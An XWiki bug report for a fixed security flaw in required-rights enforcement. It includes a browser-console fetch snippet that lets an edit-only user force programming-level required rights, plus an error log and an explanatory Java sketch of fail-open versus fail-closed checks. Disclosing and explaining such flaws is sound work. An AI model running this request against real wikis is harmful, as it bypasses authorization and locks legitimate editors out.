Details
- Bug
- Resolution: Fixed
- Blocker
- 16.10.0-rc-1
- Unit
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
- Log in as a user with edit right on a page but no script, admin or programming right.
- Open a page on which required rights aren't enforced (currently, basically all pages) or on which just edit right is enforced.
- In the browser's console, execute the following snippet to enforce required rights with programming right:
  // Only the level of the new XWiki.RequiredRightClass object is submitted; no scope field is sent.
  const formData = {
    enforceRequiredRights: '1',
    form_token: document.documentElement.dataset.xwikiFormToken,
    'addedObjects': 'XWiki.RequiredRightClass_0',
    'XWiki.RequiredRightClass_0_level': 'programming'
  };
  const url = XWiki.currentDocument.getURL('save');
  fetch(url, {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: new URLSearchParams(formData)
  }).then(response => {
    if (response.ok) {
      console.log('Page saved successfully with required rights and programming right enforced.');
    } else {
      console.error('Failed to save the page:', response.statusText);
    }
  }).catch(error => {
    console.error('Error:', error);
  });
Expected result:
An error is logged because a user without programming right shouldn't be able to enforce programming right. The user can still edit the page.
Actual result:
"Page saved successfully with required rights and programming right enforced." is displayed in the browser's console. The user cannot edit the page anymore.
In XWiki's log, the following error is logged:
2025-02-06 11:43:32,533 [qtp1667689440-70 - http://localhost:1700/xwiki/bin/save/Sandbox/] ERROR .o.i.DefaultObservationManager - Failed to send event [com.xpn.xwiki.internal.event.UserUpdatingDocumentEvent@3f6d7d88] to listener [org.xwiki.security.authorization.internal.RightsFilterListener@23987546]
java.lang.NullPointerException: Cannot invoke "org.xwiki.model.EntityType.getLowerCase()" because the return value of "org.xwiki.security.authorization.requiredrights.DocumentRequiredRight.scope()" is null
  at org.xwiki.security.authorization.internal.RightsFilterListener.checkModifiedRequiredRights(RightsFilterListener.java:123)
  at org.xwiki.security.authorization.internal.RightsFilterListener.onEvent(RightsFilterListener.java:100)
  at org.xwiki.observation.internal.DefaultObservationManager.notify(DefaultObservationManager.java:338)
  at org.xwiki.observation.internal.DefaultObservationManager.notify(DefaultObservationManager.java:303)
  at com.xpn.xwiki.XWiki.checkSavingDocument(XWiki.java:1929)
  at com.xpn.xwiki.web.SaveAction.save(SaveAction.java:290)
  at com.xpn.xwiki.web.SaveAction.action(SaveAction.java:520)
  at com.xpn.xwiki.web.XWikiAction.execute(XWikiAction.java:635)
  at com.xpn.xwiki.web.XWikiAction.execute(XWikiAction.java:338)
The content of the page still doesn't have programming right, though, and when a user with programming right tries to edit the page and the page actually contains a Velocity macro, a warning is still displayed. Therefore, the actual impact of this security issue is relatively low.
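The pattern behind this report is worth isolating: the listener that filters required rights hit an unexpected exception (the missing scope), the observation manager logged the failure, and the save went through as if the check had passed. The following Java sketch is an added illustration, not XWiki's code; every class in it (RequestedRight, DeniedException, the dispatch helpers) is a hypothetical stand-in for RightsFilterListener, DocumentRequiredRight and the observation manager. It places a check that dereferences the scope before validating anything next to one that treats a missing scope as a denial, and shows how the dispatch policy decides whether such a failure is fail-open or fail-closed:

```java
import java.util.EnumSet;
import java.util.Set;

/**
 * Added example (hypothetical types, not XWiki's API): how an exception inside an
 * authorization listener turns into a fail-open save, and two ways to close it.
 */
public class RequiredRightFilterExample {

    enum Right { EDIT, SCRIPT, ADMIN, PROGRAMMING }

    enum Scope { DOCUMENT, SPACE, WIKI }

    /** One required right as submitted with the save; scope is null when the form did not set it. */
    record RequestedRight(Right right, Scope scope) { }

    /** Thrown by the filter when the saving user may not enforce the requested right. */
    static class DeniedException extends RuntimeException {
        DeniedException(String message) { super(message); }
    }

    @FunctionalInterface
    interface Check { void run(RequestedRight requested, Set<Right> userRights); }

    /** Buggy check: uses the scope before validating it, so a null scope throws
        NullPointerException instead of DeniedException. */
    static void checkBuggy(RequestedRight requested, Set<Right> userRights) {
        String where = requested.scope().name().toLowerCase(); // NPE when scope is null
        if (!userRights.contains(requested.right())) {
            throw new DeniedException("cannot enforce " + requested.right() + " on " + where);
        }
    }

    /** Hardened check: an incomplete required right is a denial, and the right is
        validated against the user's rights before anything else is touched. */
    static void checkHardened(RequestedRight requested, Set<Right> userRights) {
        if (requested.right() == null || requested.scope() == null) {
            throw new DeniedException("required right is incomplete");
        }
        if (!userRights.contains(requested.right())) {
            throw new DeniedException("cannot enforce " + requested.right() + " on " + requested.scope());
        }
    }

    /** Fail-open dispatch: only DeniedException cancels the save; any other exception from the
        listener is logged and the save continues. This is the behaviour the report describes. */
    static boolean saveWithFailOpenDispatch(Check check, RequestedRight requested, Set<Right> userRights) {
        try {
            check.run(requested, userRights);
            return true;
        } catch (DeniedException e) {
            return false;
        } catch (RuntimeException e) {
            System.err.println("Failed to send event to listener: " + e);
            return true; // save proceeds although the check never completed
        }
    }

    /** Fail-closed dispatch: any failure inside an authorization listener cancels the save. */
    static boolean saveWithFailClosedDispatch(Check check, RequestedRight requested, Set<Right> userRights) {
        try {
            check.run(requested, userRights);
            return true;
        } catch (RuntimeException e) {
            System.err.println("Save cancelled, authorization check did not complete: " + e);
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed input mirroring the report: an edit-only user submits a programming-level
        // required right with no scope.
        Set<Right> editOnly = EnumSet.of(Right.EDIT);
        RequestedRight request = new RequestedRight(Right.PROGRAMMING, null);

        System.out.println("buggy check, fail-open dispatch:    saved="
            + saveWithFailOpenDispatch(RequiredRightFilterExample::checkBuggy, request, editOnly));
        System.out.println("hardened check, fail-open dispatch: saved="
            + saveWithFailOpenDispatch(RequiredRightFilterExample::checkHardened, request, editOnly));
        System.out.println("buggy check, fail-closed dispatch:  saved="
            + saveWithFailClosedDispatch(RequiredRightFilterExample::checkBuggy, request, editOnly));
    }
}
```

Only the first combination saves the page: the NPE is caught as a generic listener failure and the save proceeds, which is the log line and outcome shown above. Either fixing the check so that a missing scope is an explicit denial, or making the dispatcher treat any listener exception as a veto, is enough to fail closed; doing both means a future null field in the same object does not reopen the gap.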